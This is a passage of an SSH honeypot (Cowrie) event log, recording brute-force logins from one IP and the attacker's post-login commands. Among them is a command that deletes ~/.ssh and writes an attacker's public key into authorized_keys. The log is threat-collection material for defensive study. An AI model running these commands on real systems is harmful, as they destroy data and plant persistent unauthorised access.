{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T04:45:55.782856Z","src_ip":"212.227.235.229","session":"9445b41e3c9f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:45:55.784931Z","src_ip":"212.227.235.229","session":"9445b41e3c9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56966,"dst_ip":"1.2.3.4","dst_port":22,"session":"1832453e6b7c","protocol":"ssh","message":"New connection: 212.227.235.229:56966 (1.2.3.4:22) [session: 1832453e6b7c]","sensor":"my-vps","timestamp":"2025-08-26T04:45:59.260777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:45:59.261616Z","src_ip":"212.227.235.229","session":"1832453e6b7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:45:59.531045Z","src_ip":"212.227.235.229","session":"1832453e6b7c"}
{"eventid":"cowrie.login.failed","username":"sysadmin","password":"123456","message":"login attempt [sysadmin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T04:46:00.649255Z","src_ip":"212.227.235.229","session":"1832453e6b7c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:01.920339Z","src_ip":"212.227.235.229","session":"1832453e6b7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59608,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef26d9e2aa7a","protocol":"ssh","message":"New connection: 212.227.235.229:59608 (1.2.3.4:22) [session: ef26d9e2aa7a]","sensor":"my-vps","timestamp":"2025-08-26T04:46:06.861674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:06.862454Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:06.934252Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq112233","message":"login attempt [root/Qq112233] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.222704Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:07.429192Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.429988Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.431226Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.504708Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:07.664583Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.665293Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.739924Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.740900Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36126,"dst_ip":"1.2.3.4","dst_port":22,"session":"525783f92675","protocol":"ssh","message":"New connection: 212.227.235.229:36126 (1.2.3.4:22) [session: 525783f92675]","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.814437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.815411Z","src_ip":"212.227.235.229","session":"525783f92675"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:07.890735Z","src_ip":"212.227.235.229","session":"525783f92675"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:46:08.232758Z","src_ip":"212.227.235.229","session":"525783f92675"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.311060Z","src_ip":"212.227.235.229","session":"525783f92675"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36134,"dst_ip":"1.2.3.4","dst_port":22,"session":"afbebd41f486","protocol":"ssh","message":"New connection: 212.227.235.229:36134 (1.2.3.4:22) [session: afbebd41f486]","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.387277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.388143Z","src_ip":"212.227.235.229","session":"afbebd41f486"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.465365Z","src_ip":"212.227.235.229","session":"afbebd41f486"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.815381Z","src_ip":"212.227.235.229","session":"afbebd41f486"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.893785Z","src_ip":"212.227.235.229","session":"ef26d9e2aa7a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:09.894634Z","src_ip":"212.227.235.229","session":"afbebd41f486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45256,"dst_ip":"1.2.3.4","dst_port":22,"session":"86c415288c17","protocol":"ssh","message":"New connection: 212.227.235.229:45256 (1.2.3.4:22) [session: 86c415288c17]","sensor":"my-vps","timestamp":"2025-08-26T04:46:13.926872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:13.927870Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:14.206756Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.login.success","username":"root","password":"12345a","message":"login attempt [root/12345a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:46:15.360962Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:15.992803Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:15.993573Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:46:15.994815Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:16.274798Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:46:16.847762Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:46:16.848440Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:46:17.128814Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:17.129649Z","src_ip":"212.227.235.229","session":"86c415288c17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41272,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e93892e0dab","protocol":"ssh","message":"New connection: 212.227.235.229:41272 (1.2.3.4:22) [session: 7e93892e0dab]","sensor":"my-vps","timestamp":"2025-08-26T04:46:17.404645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:17.405567Z","src_ip":"212.227.235.229","session":"7e93892e0dab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:46:17.682557Z","src_ip":"212.227.235.229","session":"7e93892e0dab"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:46:18.832464Z","src_ip":"212.227.235.229","session":"7e93892e0dab"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:46:20.112486Z","src_ip":"212.227.235.229","session":"7e93892e0dab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41286,"dst_ip":"1.2.3.4","dst_port":22,"session":"e37d0e972562","protocol":"ssh","message":"New connection: 212.227.235.229:41286 (1.2.3.4:22) [session: e37d0e972562]","sensor":"my-vps","timestamp":"2025-08-26T04:46:20.388885Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:46:20.389786Z","src_ip":"212.227.235.229","session":"e37d0e972562"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS